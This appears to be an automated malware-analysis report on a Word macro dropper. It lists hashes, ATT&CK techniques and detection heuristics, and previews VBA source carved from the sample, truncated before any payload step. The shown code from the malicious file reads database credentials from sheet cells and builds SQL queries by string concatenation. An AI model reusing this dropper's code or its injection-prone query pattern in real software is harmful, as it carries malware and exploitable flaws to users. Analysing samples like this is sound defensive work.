Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 767610cc4ca2519b…

MALICIOUS

Office (OLE)

111.5 KB Created: 2020-01-09 16:57:00 Authoring application: Microsoft Office Word First seen: 2020-04-06
MD5: 18787488bc29dcefccba2ac333a4f2fa SHA-1: dda581029541fa734e2c0c065fdfe2f59d2695fd SHA-256: 767610cc4ca2519b82ddfa961c544396b74bf37ce10028d113ac7dae3efc0811
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate or Obfuscate Malicious Code

The sample contains VBA macros, including a Document_Open macro that uses CreateObject, indicating it's designed to execute code upon opening. The presence of the 'SE_PASSWORD_ARCHIVE_LURE' heuristic suggests the document may instruct the user to disable security features or provide a password to access an archive, a common tactic for bypassing gateway security. The ClamAV detection 'Doc.Dropper.Agent-9612922-0' further confirms its malicious nature as a dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-9612922-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-9612922-0
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 50824 bytes
SHA-256: 423fbef0ee6c96cfee132f965c36403c5a25593a10ed0d0c9a66ce88157ab5b4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const CP_UTF8                       As Long = 65001

#If Win64 Then
Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As LongPtr, ByVal dwFlags As LongPtr, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As LongPtr, lpMultiByteStr As Any, ByVal cchMultiByte As LongPtr, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As LongPtr
Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As LongPtr, ByVal dwFlags As LongPtr, lpMultiByteStr As Any, ByVal cchMultiByte As LongPtr, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As LongPtr) As Long
#Else
Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As Long, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As Long, ByVal lpUsedDefaultChar As Long) As Long
Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As Long, ByVal cchWideChar As Long) As Long

#End If
 

 
 Dim Defrolo As Variant
 Dim flon As Variant
 
Sub loadBancos()

    '' SERVER
    With banco(0)
        .strSource = Sheets("BANCOS").Range("C2")
        .strDriver = Sheets("BANCOS").Range("C3")
        .strLocation = Sheets("BANCOS").Range("C4")
        .strDatabase = Sheets("BANCOS").Range("C5")
        .strUser = Sheets("BANCOS").Range("C6")
        .strPassword = Sheets("BANCOS").Range("C7")
        .strPort = Sheets("BANCOS").Range("C8")
    End With
    
    '' LOCAL
    With banco(1)
        .strSource = Sheets("BANCOS").Range("F2")
        .strDriver = Sheets("BANCOS").Range("F3")
        .strLocation = Sheets("BANCOS").Range("F4")
        .strDatabase = Sheets("BANCOS").Range("F5")
        .strUser = Sheets("BANCOS").Range("F6")
        .strPassword = Sheets("BANCOS").Range("F7")
        .strPort = Sheets("BANCOS").Range("F8")
    End With

End Sub

Sub loadOrcamento(strVendedor As String, strControle As String, Optional strOperator As String, Optional strStatus As String)

    With Orcamento
        .strVendedor = strVendedor
        .strControle = strControle
        .strOperator = strOperator
        .strStatus = strStatus
    End With

End Sub

Function Transferencia(strOperacao As String, strDepartamento As String, strOrcamento As String, strLocal As String, strServer As String)
Dim Connection As New ADODB.Connection
Dim rstSincronismo As ADODB.Recordset
Set rstSincronismo = New ADODB.Recordset
Dim strSql As String

''Is Internet Connected
If IsInternetConnected() = True Then
    Set Connection = OpenConnection(strLocal)
    '' Is Connected
    If Connection.State = 1 Then
        strSql = "SELECT DISTINCT tabela FROM qrySincronismo where sincronismo = '" & strOperacao & "' and dpto = '" & strDepartamento & "'"
        Call rstSincronismo.Open(strSql, Connection, adOpenStatic, adLockOptimistic)
        '' ENVIAR/RECEBER DADOS
        Do While Not rstSincronismo.EOF
            strSql = "SELECT * FROM " & rstSincronismo.Fields("tabela") & " WHERE controle = '" & strOrcamento.strControle & "' AND vendedor = '" & strOrcamento.strVendedor & "'"
            EnvioDeDados strLocal, strServer, strSql
            
            If strOperacao = "ENVIAR" Then
                '' server ( ENVIAR )
                loadOrcamento strOrcamento.strVendedor, strOrcamento.strControle
                loadOrcamento strOrcamento.strVendedor, strOrcamento.strControle, strStatus:=ID_STATUS(banco(1), Orcamento)
                Call admOrcamentoAtualizarEtapaADO(banco(0), Orcamento)
            ElseIf strOperacao = "RECEBER" Then
   
... (truncated)